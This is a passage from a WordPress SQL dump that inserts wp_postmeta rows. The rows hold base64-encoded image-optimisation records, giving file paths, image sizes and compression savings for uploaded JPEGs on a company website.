h0IjoiMTE0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2ZsdW9yb19idy1lMTQ3MTYyMTE5ODk1NS0yNDd4MTE0LmpwZyIsInJlZHVjdGlvbiI6NDcsInRpbWUiOjE0ODM1ODU3NTMsImlkIjo2MDd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30141, 604, 'wpfc_optimisation_reduction', '1304'); 
INSERT INTO `wp_postmeta` VALUES (30142, 604, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZmx1b3JvZXh0cmVtZS1lMTQ3MTYyMDc2NjYyOC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjguanBnIiwid2lkdGgiOjI3NSwiaGVpZ2h0IjozOCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjguanBnIiwicmVkdWN0aW9uIjo4NDUsInRpbWUiOjE0ODM1ODU3NTksImlkIjoiNjA0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9leHRyZW1lLWUxNDcxNjIwNzY2NjI4LTI1MHgzOC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjM4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMjUweDM4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMjUweDM4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTc2MSwiaWQiOjYwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9leHRyZW1lLWUxNDcxNjIwNzY2NjI4LTIwMHgzOC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjM4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMjAweDM4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMjAweDM4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTc2MywiaWQiOjYwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9leHRyZW1lLWUxNDcxNjIwNzY2NjI4LTIyNXgzOC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjM4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMjI1eDM4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMjI1eDM4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTc2NSwiaWQiOjYwNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMTE0eDM4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMTE0eDM4LmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMzgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZmx1b3JvZXh0cmVtZS1lMTQ3MTYyMDc2NjYyOC0xMTR4MzguanBnIiwicmVkdWN0aW9uIjo0NTUsInRpbWUiOjE0ODM1ODU3NjcsImlkIjo2MDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9leHRyZW1lLWUxNDcxNjIwNzY2NjI4LTI0N3gzOC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9leHRyZW1lLWUxNDcxNjIwNzY2NjI4LTI0N3gzOC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjM4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2ZsdW9yb2V4dHJlbWUtZTE0NzE2MjA3NjY2MjgtMjQ3eDM4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTc2OSwiaWQiOjYwNH1d'); 
INSERT INTO `wp_postmeta` VALUES (30143, 602, 'wpfc_optimisation_reduction', '822'); 
INSERT INTO `wp_postmeta` VALUES (30144, 602, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6by01LWUxNDcxNjIwMTc1NDk0LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6by01LWUxNDcxNjIwMTc1NDk0LmpwZyIsIndpZHRoIjoyNzUsImhlaWdodCI6MTE0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6by01LWUxNDcxNjIwMTc1NDk0LmpwZyIsInJlZHVjdGlvbiI6NzAxLCJ0aW1lIjoxNDgzNTg1Nzc2LCJpZCI6IjYwMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6by01LWUxNDcxNjIwMTc1NDk0LTI1MHgxMTQuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6by01LWUxNDcxNjIwMTc1NDk0LTI1MHgxMTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6by01LWUxNDcxNjIwMTc1NDk0LTI1MHgxMTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1Nzc4LCJpZCI6NjAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8tNS1lMTQ3MTYyMDE3NTQ5NC0yMDB4MTE0LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MTE0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8tNS1lMTQ3MTYyMDE3NTQ5NC0yMDB4MTE0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem8tNS1lMTQ3MTYyMDE3NTQ5NC0yMDB4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTc4MCwiaWQiOjYwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvLTUtZTE0NzE2MjAxNzU0OTQtMjI1eDExNC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvLTUtZTE0NzE2MjAxNzU0OTQtMjI1eDExNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvLTUtZTE0NzE2MjAxNzU0OTQtMjI1eDExNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU3ODIsImlkIjo2MDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvLTUtZTE0NzE2MjAxNzU0OTQtMTE0eDExNC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvLTUtZTE0NzE2MjAxNzU0OTQtMTE0eDExNC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjExNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvLTUtZTE0NzE2MjAxNzU0OTQtMTE0eDExNC5qcGciLCJyZWR1Y3Rpb24iOjExNywidGltZSI6MTQ4MzU4NTc4NCwiaWQiOjYwMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8tNS1lMTQ3MTYyMDE3NTQ5NC0yNDd4MTE0LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8tNS1lMTQ3MTYyMDE3NTQ5NC0yNDd4MTE0LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMTE0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem8tNS1lMTQ3MTYyMDE3NTQ5NC0yNDd4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTc4NiwiaWQiOjYwMn1d'); 
INSERT INTO `wp_postmeta` VALUES (30145, 599, 'wpfc_optimisation_reduction', '825'); 
INSERT INTO `wp_postmeta` VALUES (30146, 599, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmVydHJlbC1lMTQ3MTYxOTg1NTUyMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3ZlcnRyZWwtZTE0NzE2MTk4NTU1MjMuanBnIiwid2lkdGgiOjI3NSwiaGVpZ2h0IjoxMTQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92ZXJ0cmVsLWUxNDcxNjE5ODU1NTIzLmpwZyIsInJlZHVjdGlvbiI6Njg0LCJ0aW1lIjoxNDgzNTg1NzkzLCJpZCI6IjU5OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmVydHJlbC1lMTQ3MTYxOTg1NTUyMy0yNTB4MTE0LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTE0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3ZlcnRyZWwtZTE0NzE2MTk4NTU1MjMtMjUweDExNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92ZXJ0cmVsLWUxNDcxNjE5ODU1NTIzLTI1MHgxMTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1Nzk1LCJpZCI6NTk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3ZlcnRyZWwtZTE0NzE2MTk4NTU1MjMtMjAweDExNC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92ZXJ0cmVsLWUxNDcxNjE5ODU1NTIzLTIwMHgxMTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmVydHJlbC1lMTQ3MTYxOTg1NTUyMy0yMDB4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTc5NywiaWQiOjU5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92ZXJ0cmVsLWUxNDcxNjE5ODU1NTIzLTIyNXgxMTQuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmVydHJlbC1lMTQ3MTYxOTg1NTUyMy0yMjV4MTE0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3ZlcnRyZWwtZTE0NzE2MTk4NTU1MjMtMjI1eDExNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU3OTksImlkIjo1OTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92ZXJ0cmVsLWUxNDcxNjE5ODU1NTIzLTExNHgxMTQuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmVydHJlbC1lMTQ3MTYxOTg1NTUyMy0xMTR4MTE0LmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTE0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3ZlcnRyZWwtZTE0NzE2MTk4NTU1MjMtMTE0eDExNC5qcGciLCJyZWR1Y3Rpb24iOjEzNywidGltZSI6MTQ4MzU4NTgwMSwiaWQiOjU5OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3ZlcnRyZWwtZTE0NzE2MTk4NTU1MjMtMjQ3eDExNC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92ZXJ0cmVsLWUxNDcxNjE5ODU1NTIzLTI0N3gxMTQuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIxMTQiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmVydHJlbC1lMTQ3MTYxOTg1NTUyMy0yNDd4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTgwMywiaWQiOjU5OX1d'); 
INSERT INTO `wp_postmeta` VALUES (30147, 598, 'wpfc_optimisation_reduction', '1413'); 
INSERT INTO `wp_postmeta` VALUES (30148, 598, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTItZTE0NzMyNjAwODA3MDYuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMi1lMTQ3MzI2MDA4MDcwNi5qcGciLCJ3aWR0aCI6NDc5LCJoZWlnaHQiOjE5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem8tNTItMS0yLWUxNDczMjYwMDgwNzA2LmpwZyIsInJlZHVjdGlvbiI6MTIyNSwidGltZSI6MTQ4MzU4NTgxMCwiaWQiOiI1OTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItMS0yLWUxNDczMjYwMDgwNzA2LTM0MHgxOTguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTItZTE0NzMyNjAwODA3MDYtMzQweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMi1lMTQ3MzI2MDA4MDcwNi0zNDB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTgxMiwiaWQiOjU5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMi1lMTQ3MzI2MDA4MDcwNi0yNTB4MTk4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItMS0yLWUxNDczMjYwMDgwNzA2LTI1MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmF6by01Mi0xLTItZTE0NzMyNjAwODA3MDYtMjUweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4MTQsImlkIjo1OTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTItZTE0NzMyNjAwODA3MDYtMjAweDE5OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMi1lMTQ3MzI2MDA4MDcwNi0yMDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem8tNTItMS0yLWUxNDczMjYwMDgwNzA2LTIwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1ODE2LCJpZCI6NTk4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItMS0yLWUxNDczMjYwMDgwNzA2LTIyNXgxOTguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTItZTE0NzMyNjAwODA3MDYtMjI1eDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMi1lMTQ3MzI2MDA4MDcwNi0yMjV4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTgxOCwiaWQiOjU5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItMS0yLWUxNDczMjYwMDgwNzA2LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTItZTE0NzMyNjAwODA3MDYtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMi1lMTQ3MzI2MDA4MDcwNi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTgzLCJ0aW1lIjoxNDgzNTg1ODIwLCJpZCI6NTk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTItZTE0NzMyNjAwODA3MDYtMjQ3eDE5OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMi1lMTQ3MzI2MDA4MDcwNi0yNDd4MTk4LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMTk4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90Y